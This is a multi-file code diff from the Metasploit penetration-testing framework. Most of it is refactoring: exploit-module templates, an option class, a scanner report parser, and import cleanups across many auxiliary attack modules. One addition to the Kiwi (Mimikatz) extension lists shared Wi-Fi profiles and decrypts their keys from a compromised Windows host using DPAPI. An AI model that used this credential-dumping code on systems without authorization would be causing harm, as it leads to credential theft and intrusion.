%Q|
require 'msf/core/modules/external/bridge'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => #{mod.meta['name'].dump},
'Description' => #{mod.meta['description'].dump},
'Author' =>
[
#{mod.meta['authors'].map(&:dump).join(', ')}
],
'License' => MSF_LICENSE,
'References' =>
[
#{mod.meta['references'].map do |r|
"[#{r['type'].upcase.dump}, #{r['ref'].dump}]"
end.join(', ')}
],
'DisclosureDate' => #{mod.meta['date'].dump},
'Privileged' => #{mod.meta['privileged'].inspect},
'Platform' => [#{mod.meta['targets'].map{|t| t['platform'].dump}.uniq.join(', ')}],
'Payload' =>
{
'DisableNops' => true
},
'Targets' =>
[
#{mod.meta['targets'].map do |t|
%Q^[#{t['platform'].dump} + ' ' + #{t['arch'].dump},
{'Arch' => ARCH_#{t['arch'].upcase}, 'Platform' => #{t['platform'].dump} }]^
end.join(', ')}
],
'DefaultTarget' => 0,
'DefaultOptions' => { 'WfsDelay' => 5 }
))
register_options([
#{mod.meta['options'].map do |n, o|
"Opt#{o['type'].capitalize}.new(#{n.dump},
[#{o['required']}, #{o['description'].dump}, #{o['default'].inspect}])"
end.join(', ')}
], self.class)
end
def execute_command(cmd, opts)
mod = Msf::Modules::External::Bridge.new(#{mod.path.dump})
mod.run(datastore.merge(command: cmd))
wait_status(mod)
true
end
def exploit
print_status("Exploiting...")
execute_cmdstager({:flavor => :wget})
end
def wait_status(mod)
while mod.running
m = mod.get_status
if m
case m['level']
when 'error'
print_error m['message']
when 'warning'
print_warning m['message']
when 'good'
print_good m['message']
when 'info'
print_status m['message']
when 'debug'
vprint_status m['message']
else
print_status m['message']
end
end
end
end
end
|
meta = mod_meta_common(mod)
meta = mod_meta_exploit(mod, meta)
meta[:command_stager_flavor] = mod.meta['payload']['command_stager_flavor'].dump
render_template('remote_exploit_cmd_stager.erb', meta)
end
end

7
lib/msf/core/modules/external/templates/common_metadata.erb vendored Normal file
View File

@ -0,0 +1,7 @@
'Name' => <%= meta[:name] %>,
'Description' => <%= meta[:description] %>,
'Author' =>
[
<%= meta[:authors] %>
],
'License' => MSF_LICENSE,

48
lib/msf/core/modules/external/templates/remote_exploit_cmd_stager.erb vendored Normal file
View File

@ -0,0 +1,48 @@
require 'msf/core/modules/external/bridge'
require 'msf/core/module/external'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Module::External
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
<%= common_metadata meta %>
'References' =>
[
<%= meta[:references] %>
],
'DisclosureDate' => <%= meta[:date] %>,
'Privileged' => <%= meta[:privileged] %>,
'Platform' => [<%= meta[:platform] %>],
'Payload' =>
{
'DisableNops' => true
},
'Targets' =>
[
<%= meta[:targets] %>
],
'DefaultTarget' => 0,
'DefaultOptions' => { 'WfsDelay' => <%= meta[:wfsdelay] %> }
))
register_options([
<%= meta[:options] %>
])
end
def execute_command(cmd, opts)
mod = Msf::Modules::External::Bridge.open(<%= meta[:path] %>)
mod.run(datastore.merge(command: cmd))
wait_status(mod)
true
end
def exploit
print_status("Exploiting...")
execute_cmdstager({:flavor => :<%= meta[:command_stager_flavor] %>})
end
end

2
lib/msf/core/opt.rb
View File

@ -28,7 +28,7 @@ module Msf
# @return [OptAddress]
def self.LHOST(default=nil, required=true, desc="The listen address")
Msf::OptAddress.new(__method__.to_s, [ required, desc, default ])
Msf::OptAddressLocal.new(__method__.to_s, [ required, desc, default ])
end
# @return [OptPort]

41
lib/msf/core/opt_address_local.rb Normal file
View File

@ -0,0 +1,41 @@
# -*- coding: binary -*-
require 'network_interface'
module Msf
###
#
# Network address option.
#
###
class OptAddressLocal < OptAddress
def normalize(value)
return nil unless value.kind_of?(String)
if NetworkInterface.interfaces.include?(value)
ip_address = NetworkInterface.addresses(value).values.flatten.collect{|x| x['addr']}.select do |addr|
begin
IPAddr.new(addr).ipv4?
rescue IPAddr::InvalidAddressError => e
false
end
end
return false if ip_address.blank?
return ip_address.first
end
return value
end
def valid?(value, check_empty: true)
return false if check_empty && empty_required_value?(value)
return false unless value.kind_of?(String) or value.kind_of?(NilClass)
return true if NetworkInterface.interfaces.include?(value)
return super
end
end
end

1
lib/msf/core/option_container.rb
View File

@ -7,6 +7,7 @@ module Msf
autoload :OptBase, 'msf/core/opt_base'
autoload :OptAddress, 'msf/core/opt_address'
autoload :OptAddressLocal, 'msf/core/opt_address_local'
autoload :OptAddressRange, 'msf/core/opt_address_range'
autoload :OptBool, 'msf/core/opt_bool'
autoload :OptEnum, 'msf/core/opt_enum'

4
lib/msf/core/payload_generator.rb
View File

@ -411,6 +411,10 @@ module Msf
# Allow comma separated list of encoders so users can choose several
encoder.split(',').each do |chosen_encoder|
e = framework.encoders.create(chosen_encoder)
if e.nil?
cli_print "Skipping invalid encoder #{chosen_encoder}"
next
end
e.datastore.import_options_from_hash(datastore)
encoders << e if e
end

29
lib/msf/ui/console/command_dispatcher/core.rb
View File

@ -827,10 +827,33 @@ class Core
end
def cmd_route_help
print_line "Usage: route [add/remove/get/flush/print] subnet netmask [comm/sid]"
print_line
print_line "Route traffic destined to a given subnet through a supplied session."
print_line "The default comm is Local."
print_line
print_line "Usage:"
print_line " route [add/remove] subnet netmask [comm/sid]"
print_line " route [add/remove] cidr [comm/sid]"
print_line " route [get] <host or network>"
print_line " route [flush]"
print_line " route [print]"
print_line
print_line "Subcommands:"
print_line " add - make a new route"
print_line " remove - delete a route; 'del' is an alias"
print_line " flush - remove all routes"
print_line " get - display the route for a given target"
print_line " print - show all active routes"
print_line
print_line "Examples:"
print_line " Add a route for all hosts from 192.168.0.0 to 192.168.0.0 through session 1"
print_line " route add 192.168.0.0 255.255.255.0 1"
print_line " route add 192.168.0.0/24 1"
print_line
print_line " Delete the above route"
print_line " route remove 192.168.0.0/24 1"
print_line " route del 192.168.0.0 255.255.255.0 1"
print_line
print_line " Display the route that would be used for the given host or network"
print_line " route get 192.168.0.11"
print_line
end

2
lib/net/dns/names/names.rb
View File

@ -19,7 +19,7 @@ module Net # :nodoc:
name = ""
packetlen = packet.size
while true
raise ExpandError, "offset is greater than packet lenght!" if packetlen < (offset+1)
raise ExpandError, "offset is greater than packet length!" if packetlen < (offset+1)
len = packet.unpack("@#{offset} C")[0]
if len == 0

219
lib/rex/parser/acunetix_nokogiri.rb
View File

@ -24,6 +24,7 @@ module Rex
def start_document
@parse_warnings = []
@resolv_cache = {}
@host_object = nil
end
def start_element(name=nil,attrs=[])
@ -32,9 +33,12 @@ module Rex
@state[:current_tag][name] = true
case name
when "Scan" # Start of the thing.
when "Name", "StartURL", "Banner", "Os"
@state[:report_item] = {}
when "Name", "StartURL", "StartTime", "Banner", "Os", "Text", "Severity", "CWE", "URL", "Parameter"
@state[:has_text] = true
when "LoginSequence" # Skipping for now
when "ReportItem"
@state[:report_item] = {}
when "Crawler"
record_crawler(attrs)
when "FullURL"
@ -62,14 +66,56 @@ module Rex
# StartURL does not always include the scheme
@text.prepend("http://") unless URI.parse(@text).scheme
collect_host
collect_service
collect_service_from_url
@text = nil
handle_parse_warnings &block
host_object = report_host &block
if host_object
report_starturl_service(host_object,&block)
db.report_import_note(@args[:wspace],host_object)
@host_object = report_host &block
if @host_object
report_starturl_service(&block)
db.report_import_note(@args[:wspace],@host_object)
end
when "StartTime"
@state[:has_text] = false
@state[:timestamp] = @text.to_s.tr!(',','').tr!('/','-')
@text = nil
when "Text"
@state[:has_text] = false
service = collect_service_from_kbitem_text
@text = nil
return unless service
handle_parse_warnings &block
if @host_object
report_kbitem_service(service,&block)
end
when "Severity"
@state[:has_text] = false
collect_report_item_severity
@text = nil
when "CWE"
@state[:has_text] = false
collect_report_item_cwe
@text = nil
when "URL"
@state[:has_text] = false
collect_report_item_reference_url
@text = nil
when "Parameter"
@state[:has_text] = false
collect_report_item_parameter
@text = nil
when "ReportItem"
vuln = collect_vuln_from_report_item
if vuln.nil?
@state[:page_request] = @state[:page_response] = nil
return
end
handle_parse_warnings &block
if @state[:vuln_info][:refs].nil?
report_web_vuln(&block)
else
report_other_vuln(&block)
end
@state[:page_request] = @state[:page_response] = nil
when "Banner"
@state[:has_text] = false
collect_and_report_banner
@ -134,7 +180,7 @@ module Rex
@report_data[:state] = Msf::HostState::Alive
end
def collect_service
def collect_service_from_url
return unless @report_data[:host]
return unless in_tag("Scan")
return unless @text
@ -146,6 +192,44 @@ module Rex
@report_data[:ports] << @state[:starturl_port]
end
def collect_service_from_kbitem_text
return unless @host_object
return unless in_tag("Scan")
return unless in_tag("KBase")
return unless in_tag("KBItem")
return unless @text
return if @text.strip.empty?
return unless @text =~ /server is running/
matched = / (?<name>\w+) server is running on (?<proto>\w+) port (?<portnum>\d+)\./.match(@text)
@report_data[:ports] ||= []
@report_data[:ports] << matched[:portnum]
return matched
end
def collect_vuln_from_report_item
@state[:vuln_info] = nil
return unless @host_object
return unless in_tag("Scan")
return unless in_tag("ReportItems")
return unless in_tag("ReportItem")
return unless @state[:report_item][:name]
return unless @state[:report_item][:severity]
return unless @state[:report_item][:severity].downcase == "high"
@state[:vuln_info] = {}
@state[:vuln_info][:name] = @state[:report_item][:name]
if @state[:page_request_verb].nil? && @state[:report_item][:name] =~ /deprecated/
# Treating this as a regular vuln, not web-specific
@state[:vuln_info][:refs] = ["ACX-#{@state[:report_item][:reference_url]}"]
unless @state[:report_item_cwe].nil?
@state[:vuln_info][:refs][0] << ",#{@state[:report_item][:cwe]}"
end
end
@state[:vuln_info][:severity] = @state[:report_item][:severity].downcase
@state[:vuln_info][:cwe] = @state[:report_item][:cwe]
return @state[:vuln_info]
end
def collect_and_report_banner
return unless (svc = @state[:starturl_service_object]) # Yes i want assignment
return unless @text
@ -165,7 +249,37 @@ module Rex
return unless in_tag("ReportItem")
return unless @text
return if @text.strip.empty?
@state[:report_item] = @text
@state[:report_item][:name] = @text
end
def collect_report_item_severity
return unless in_tag("ReportItem")
return unless @text
return if @text.strip.empty?
@state[:report_item][:severity] = @text
end
def collect_report_item_cwe
return unless in_tag("ReportItem")
return unless @text
return if @text.strip.empty?
@state[:report_item][:cwe] = @text
end
def collect_report_item_reference_url
return unless in_tag("ReportItem")
return unless in_tag("References")
return unless in_tag("Reference")
return unless @text
return if @text.strip.empty?
@state[:report_item][:reference_url] = @text
end
def collect_report_item_parameter
return unless in_tag("ReportItem")
return unless @text
return if @text.strip.empty?
@state[:report_item][:parameter] = @text
end
# @state[:fullurl] is set by report_web_site
@ -211,20 +325,26 @@ module Rex
def report_web_page(&block)
return if should_skip_this_page
return unless @state[:web_site]
@state[:page_request_verb] = nil
return unless @state[:page_request]
return if @state[:page_request].strip.empty?
return unless @state[:page_response]
return if @state[:page_response].strip.empty?
path,query_string = parse_request(@state[:page_request])
verb,path,query_string = parse_request(@state[:page_request])
return unless path
parsed_response = parse_response(@state[:page_response])
return unless parsed_response
@state[:page_request_verb] = verb
web_page_info = {}
if @state[:page_response].strip.blank?
web_page_info[:code] = ""
web_page_info[:headers] = {}
web_page_info[:body] = ""
else
parsed_response = parse_response(@state[:page_response])
return unless parsed_response
web_page_info[:code] = parsed_response[:code].to_i
web_page_info[:headers] = parsed_response[:headers]
web_page_info[:body] = parsed_response[:body]
end
web_page_info[:web_site] = @state[:web_site]
web_page_info[:path] = path
web_page_info[:code] = parsed_response[:code].to_i
web_page_info[:headers] = parsed_response[:headers]
web_page_info[:body] = parsed_response[:body]
web_page_info[:query] = query_string || ""
url = ""
url << @state[:web_site].service.name.to_s << "://"
@ -234,13 +354,51 @@ module Rex
return unless uri # Sanity checker
db.emit(:web_page, url, &block) if block
web_page_object = db_report(:web_page,web_page_info)
@state[:page_request] = @state[:page_response] = nil
@state[:web_page] = web_page_object
end
def report_web_vuln(&block)
return if should_skip_this_page
return unless @state[:web_page]
return unless @state[:web_site]
return unless @state[:vuln_info]
web_vuln_info = {}
web_vuln_info[:web_site] = @state[:web_site]
web_vuln_info[:path] = @state[:web_page][:path]
web_vuln_info[:query] = @state[:web_page][:query]
web_vuln_info[:method] = @state[:page_request_verb]
web_vuln_info[:pname] = ""
if @state[:page_response].blank?
web_vuln_info[:proof] = "<empty response>"
else
web_vuln_info[:proof] = @state[:page_response]
end
web_vuln_info[:risk] = 5
web_vuln_info[:params] = []
unless @state[:report_item][:parameter].blank?
# Acunetix only lists a single paramter...
web_vuln_info[:params] << [ @state[:report_item][:parameter].to_s, "" ]
end
web_vuln_info[:category] = "imported"
web_vuln_info[:confidence] = 100
web_vuln_info[:name] = @state[:vuln_info][:name]
db.emit(:web_vuln, web_vuln_info[:name], &block) if block
vuln = db_report(:web_vuln, web_vuln_info)
end
def report_other_vuln(&block)
return if should_skip_this_page
return unless @state[:vuln_info]
db.emit(:vuln, @state[:vuln_info][:name], &block) if block
db_report(:vuln, @state[:vuln_info].merge(:host => @host_object))
end
# Reasons why we shouldn't collect a particular web page.
def should_skip_this_page
if @state[:report_item] =~ /Unrestricted File Upload/
if @state[:report_item][:name] =~ /Unrestricted File Upload/
# This means that the page being collected is something the
# auditor put there, so it's not useful to report on.
return true
@ -259,6 +417,7 @@ module Rex
return unless verb
return unless req
path,query_string = req.split(/\?/)[0,2]
return verb,path,query_string
end
def parse_response(response)
@ -302,14 +461,14 @@ module Rex
# The service is super important, so we hang on to it for the
# rest of the scan.
def report_starturl_service(host_object,&block)
return unless host_object
def report_starturl_service(&block)
return unless @host_object
return unless @state[:starturl_uri]
name = @state[:starturl_uri].scheme
port = @state[:starturl_uri].port
addr = host_object.address
addr = @host_object.address
svc = {
:host => host_object,
:host => @host_object,
:port => port,
:name => name.dup,
:proto => "tcp"
@ -320,6 +479,22 @@ module Rex
end
end
def report_kbitem_service(service,&block)
return unless @host_object
return unless @state[:starturl_uri]
addr = @host_object.address
svc = {
:host => @host_object,
:port => service[:portnum].to_i,
:name => service[:name].dup.downcase,
:proto => service[:proto].dup.downcase
}
if service[:name] and service[:portnum]
db.emit(:service,[addr,service[:portnum]].join(":"),&block) if block
db_report(:service,svc)
end
end
def report_web_site(url,&block)
return unless in_tag("Crawler")
return unless url

2
lib/rex/payloads/meterpreter/uri_checksum.rb
View File

@ -66,7 +66,7 @@ module Rex
# @param len [Integer] An optional URI length value, including the leading slash
# @return [String] The URI string for connections
def generate_uri_uuid(sum, uuid, len=nil)
curl_uri_len = URI_CHECKSUM_UUID_MIN_LEN+rand(URI_CHECKSUM_CONN_MAX_LEN-URI_CHECKSUM_UUID_MIN_LEN)
curl_uri_len = URI_CHECKSUM_UUID_MIN_LEN + rand(URI_CHECKSUM_CONN_MAX_LEN - URI_CHECKSUM_UUID_MIN_LEN)
curl_prefix = uuid.to_uri
if len

51
lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb
View File

@ -379,6 +379,57 @@ class Kiwi < Extension
content.join('')
end
#
# Access and parse a set of wifi profiles using the given interfaces
# list, which contains the list of profile xml files on the target.
#
# @return [Hash]
def wifi_parse_shared(wifi_interfaces)
results = []
exec_cmd('"base64 /in:off /out:on"')
wifi_interfaces.keys.each do |key|
interface = {
:guid => key,
:desc => nil,
:state => nil,
:profiles => []
}
wifi_interfaces[key].each do |wifi_profile_path|
cmd = "\"dpapi::wifi /in:#{wifi_profile_path} /unprotect\""
output = exec_cmd(cmd)
lines = output.lines
profile = {
:name => nil,
:auth => nil,
:key_type => nil,
:shared_key => nil
}
while lines.length > 0 do
line = lines.shift.strip
if line =~ /^\* SSID name\s*: (.*)$/
profile[:name] = $1
elsif line =~ /^\* Authentication\s*: (.*)$/
profile[:auth] = $1
elsif line =~ /^\* Key Material\s*: (.*)$/
profile[:shared_key] = $1
end
end
interface[:profiles] << profile
end
results << interface
end
exec_cmd('"base64 /in:on /out:on"')
results
end
#
# List all the wifi interfaces and the profiles associated
# with them. Also show the raw text passwords for each.

84
lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb
View File

@ -72,7 +72,8 @@ class Console::CommandDispatcher::Kiwi
'kerberos_ticket_list' => 'List all kerberos tickets (unparsed)',
'lsa_dump_secrets' => 'Dump LSA secrets (unparsed)',
'lsa_dump_sam' => 'Dump LSA SAM (unparsed)',
'wifi_list' => 'List wifi profiles/creds',
'wifi_list' => 'List wifi profiles/creds for the current user',
'wifi_list_shared' => 'List shared wifi profiles/creds (requires SYSTEM)',
}
end
@ -303,37 +304,50 @@ class Console::CommandDispatcher::Kiwi
end
#
# Dump all the wifi profiles/credentials
# Dump all the shared wifi profiles/credentials
#
def cmd_wifi_list_shared(*args)
interfaces_dir = '%AllUsersProfile%\Microsoft\Wlansvc\Profiles\Interfaces'
interfaces_dir = client.fs.file.expand_path(interfaces_dir)
files = client.fs.file.search(interfaces_dir, '*.xml', true)
if files.length == 0
print_error('No shared WiFi profiles found.')
else
interfaces = {}
files.each do |f|
interface_guid = f['path'].split("\\")[-1]
full_path = "#{f['path']}\\#{f['name']}"
interfaces[interface_guid] ||= []
interfaces[interface_guid] << full_path
end
results = client.kiwi.wifi_parse_shared(interfaces)
if results.length > 0
display_wifi_profiles(results)
else
print_line
print_error('No shared wireless profiles found on the target.')
end
end
true
end
#
# Dump all the wifi profiles/credentials for the current user
#
def cmd_wifi_list(*args)
results = client.kiwi.wifi_list
if results.length > 0
results.each do |r|
table = Rex::Text::Table.new(
'Header' => "#{r[:desc]} - #{r[:guid]}",
'Indent' => 0,
'SortIndex' => 0,
'Columns' => [
'Name', 'Auth', 'Type', 'Shared Key'
]
)
print_line
r[:profiles].each do |p|
table << [p[:name], p[:auth], p[:key_type], p[:shared_key]]
end
print_line(table.to_s)
print_line("State: #{r[:state]}")
end
display_wifi_profiles(results)
else
print_line
print_error('No wireless profiles found on the target.')
end
print_line
return true
true
end
@@creds_opts = Rex::Parser::Arguments.new(
@ -401,6 +415,30 @@ class Console::CommandDispatcher::Kiwi
protected
def display_wifi_profiles(profiles)
profiles.each do |r|
header = r[:guid]
header = "#{r[:desc]} - #{header}" if r[:desc]
table = Rex::Text::Table.new(
'Header' => header,
'Indent' => 0,
'SortIndex' => 0,
'Columns' => [
'Name', 'Auth', 'Type', 'Shared Key'
]
)
print_line
r[:profiles].each do |p|
table << [p[:name], p[:auth], p[:key_type] || 'Unknown', p[:shared_key]]
end
print_line(table.to_s)
print_line("State: #{r[:state] || 'Unknown'}")
end
end
def check_is_domain_user(msg='Running as SYSTEM, function will not work.')
if client.sys.config.is_system?
print_warning(msg)

2
lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb
View File

@ -58,7 +58,7 @@ class Console::CommandDispatcher::Stdapi::Net
'-r' => [true, 'Forward: remote host to connect to.'],
'-p' => [true, 'Forward: remote port to connect to. Reverse: remote port to listen on.'],
'-R' => [false, 'Indicates a reverse port forward.'],
'-L' => [true, 'Forward: local host to listen on (optional). Remote: local host to connect to.'])
'-L' => [true, 'Forward: local host to listen on (optional). Reverse: local host to connect to.'])
#
# Options for the netstat command.

6
metasploit-framework.gemspec
View File

@ -65,9 +65,9 @@ Gem::Specification.new do |spec|
# are needed when there's no database
spec.add_runtime_dependency 'metasploit-model'
# Needed for Meterpreter
spec.add_runtime_dependency 'metasploit-payloads', '1.2.24'
spec.add_runtime_dependency 'metasploit-payloads', '1.2.28'
# Needed for the next-generation POSIX Meterpreter
spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.8'
spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.9'
# Needed by msfgui and other rpc components
spec.add_runtime_dependency 'msgpack'
# get list of network interfaces, like eth* from OS.
@ -77,7 +77,7 @@ Gem::Specification.new do |spec|
# Needed by anemone crawler
spec.add_runtime_dependency 'nokogiri'
# Needed by db.rb and Msf::Exploit::Capture
spec.add_runtime_dependency 'packetfu', '1.1.13.pre'
spec.add_runtime_dependency 'packetfu'
# For sniffer and raw socket modules
spec.add_runtime_dependency 'pcaprub'
# Needed for module caching in Mdm::ModuleDetails

4
modules/auxiliary/admin/2wire/xslt_password_reset.rb
View File

@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
@ -35,7 +33,7 @@ class MetasploitModule < Msf::Auxiliary
register_options(
[
OptString.new('PASSWORD', [ true, 'The password to reset to', 'admin'])
], self.class)
])
end
def run

4
modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb
View File

@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer::HTML
@ -61,7 +59,7 @@ class MetasploitModule < Msf::Auxiliary
OptBool.new('HIDE_IFRAME', [
true, "Hide the exploit iframe from the user", true
])
], self.class)
])
end
def on_request_uri(cli, request)

4
modules/auxiliary/admin/appletv/appletv_display_image.rb
View File

@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
@ -37,7 +35,7 @@ class MetasploitModule < Msf::Auxiliary
OptInt.new('TIME', [true, 'Time in seconds to show the image', 10]),
OptPath.new('FILE', [true, 'Image to upload and show']),
OptString.new('HttpPassword', [false, 'The password for AppleTV AirPlay'])
], self.class)
])
# We're not actually using any of these against AppleTV in our Rex HTTP client init,
# so deregister them so we don't overwhelm the user with fake options.

3
modules/auxiliary/admin/appletv/appletv_display_video.rb
View File

@ -3,7 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'uri'
class MetasploitModule < Msf::Auxiliary
@ -42,7 +41,7 @@ class MetasploitModule < Msf::Auxiliary
OptInt.new('TIME', [true, 'Time in seconds to show the video', 60]),
OptString.new('URL', [true, 'URL of video to show. Must use an IP address']),
OptString.new('HttpPassword', [false, 'The password for AppleTV AirPlay'])
], self.class)
])
# We're not actually using any of these against AppleTV in our Rex HTTP client init,
# so deregister them so we don't overwhelm the user with fake options.

2
modules/auxiliary/admin/atg/atg_client.rb
View File

@ -4,8 +4,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::Tcp

1
modules/auxiliary/admin/aws/aws_launch_instances.rb
View File

@ -3,7 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'metasploit/framework/aws/client'
class MetasploitModule < Msf::Auxiliary

6
modules/auxiliary/admin/backupexec/dump.rb
View File

@ -4,8 +4,6 @@
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
@ -41,7 +39,7 @@ class MetasploitModule < Msf::Auxiliary
register_options(
[
Opt::RPORT(10000),
OptAddress.new('LHOST',
OptAddressLocal.new('LHOST',
[
false,
"The local IP address to accept the data connection"
@ -67,7 +65,7 @@ class MetasploitModule < Msf::Auxiliary
"backupexec_dump.mtf"
]
),
], self.class)
])
end
def run

4
modules/auxiliary/admin/backupexec/registry.rb
View File

@ -4,8 +4,6 @@
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
@ -48,7 +46,7 @@ class MetasploitModule < Msf::Auxiliary
"Compromised by Metasploit!\r\n"
]
),
], self.class)
])
end
def auxiliary_commands

4
modules/auxiliary/admin/chromecast/chromecast_reset.rb
View File

@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
@ -30,7 +28,7 @@ class MetasploitModule < Msf::Auxiliary
register_options([
Opt::RPORT(8008)
], self.class)
])
end
def run

4
modules/auxiliary/admin/chromecast/chromecast_youtube.rb
View File

@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
@ -30,7 +28,7 @@ class MetasploitModule < Msf::Auxiliary
register_options([
Opt::RPORT(8008),
OptString.new('VID', [true, 'Video ID', 'kxopViU98Xo'])
], self.class)
])
end
def run

4
modules/auxiliary/admin/cisco/cisco_asa_extrabacon.rb
View File

@ -2,8 +2,6 @@
# auxiliary/admin/cisco/cisco_asa_extrabacon.rb
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::SNMPClient
@ -46,7 +44,7 @@ class MetasploitModule < Msf::Auxiliary
register_options([
OptEnum.new('ASAVER', [ false, 'Target ASA version (default autodetect)', 'auto', ['auto']+@offsets.keys]),
], self.class)
])
deregister_options("VERSION")
datastore['VERSION'] = '2c' # SNMP v. 2c required it seems

4
modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb
View File

@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
@ -40,7 +38,7 @@ class MetasploitModule < Msf::Auxiliary
OptString.new('USERNAME', [true, 'Username to use', '']),
OptString.new('PASSWORD', [true, 'Password to use', '']),
OptBool.new('SSL', [true, 'Use SSL', true])
], self.class)
])
end
def run_host(ip)

4
modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb
View File

@ -4,8 +4,6 @@
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
@ -36,7 +34,7 @@ class MetasploitModule < Msf::Auxiliary
register_options(
[
Opt::RPORT(21),
], self.class)
])
end
def run

4
modules/auxiliary/admin/db2/db2rcmd.rb
View File

@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::SMB::Client
@ -33,7 +31,7 @@ class MetasploitModule < Msf::Auxiliary
OptString.new('CMD', [ true, 'The command to execute', 'ver']),
OptString.new('SMBUser', [ true, 'The username to authenticate as', 'db2admin']),
OptString.new('SMBPass', [ true, 'The password for the specified username', 'db2admin'])
], self.class )
])
end
def run

4
modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb
View File

@ -4,8 +4,6 @@
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
@ -31,7 +29,7 @@ class MetasploitModule < Msf::Auxiliary
register_options([
Opt::RPORT(8030),
OptBool.new('SSL', [true, 'Use SSL', true])
], self.class)
])
end
def run

4
modules/auxiliary/admin/edirectory/edirectory_edirutil.rb
View File

@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
@ -104,7 +102,7 @@ class MetasploitModule < Msf::Auxiliary
[
Opt::RPORT(8028),
OptString.new("PARAM", [false, 'Specify a parameter for the action'])
], self.class)
])
end
def run

4
modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb
View File

@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
@ -32,7 +30,7 @@ class MetasploitModule < Msf::Auxiliary
[
Opt::RPORT(3000),
OptString.new('CMD', [ false, 'The OS command to execute', 'hostname']),
], self.class)
])
end
def run

4
modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb
View File

@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
@ -32,7 +30,7 @@ class MetasploitModule < Msf::Auxiliary
[
Opt::RPORT(3500),
OptString.new('CMD', [ false, 'The OS command to execute', 'echo metasploit > metasploit.txt']),
], self.class)
])
end
def run

2
modules/auxiliary/admin/firetv/firetv_youtube.rb
View File

@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient

4
modules/auxiliary/admin/hp/hp_data_protector_cmd.rb
View File

@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
@ -50,7 +48,7 @@ class MetasploitModule < Msf::Auxiliary
[
Opt::RPORT(5555),
OptString.new("CMD", [true, 'File to execute', 'Windows\System32\calc.exe'])
], self.class)
])
end

4
modules/auxiliary/admin/hp/hp_imc_som_create_account.rb
View File

@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
@ -42,7 +40,7 @@ class MetasploitModule < Msf::Auxiliary
Opt::RPORT(8080),
OptString.new('USERNAME', [true, 'Username for the new account', 'msf']),
OptString.new('PASSWORD', [true, 'Password for the new account', 'p4ssw0rd'])
], self.class)
])
end
def get_service_desk_strong_name

2
modules/auxiliary/admin/http/allegro_rompager_auth_bypass.rb
View File

@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report

4
modules/auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss.rb
View File

@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer::HTML
@ -87,7 +85,7 @@ class MetasploitModule < Msf::Auxiliary
"A URL to inject into a script tag in the context of the device web interface.",
''
])
], self.class)
])
end
def run

4
modules/auxiliary/admin/http/axigen_file_access.rb
View File

@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
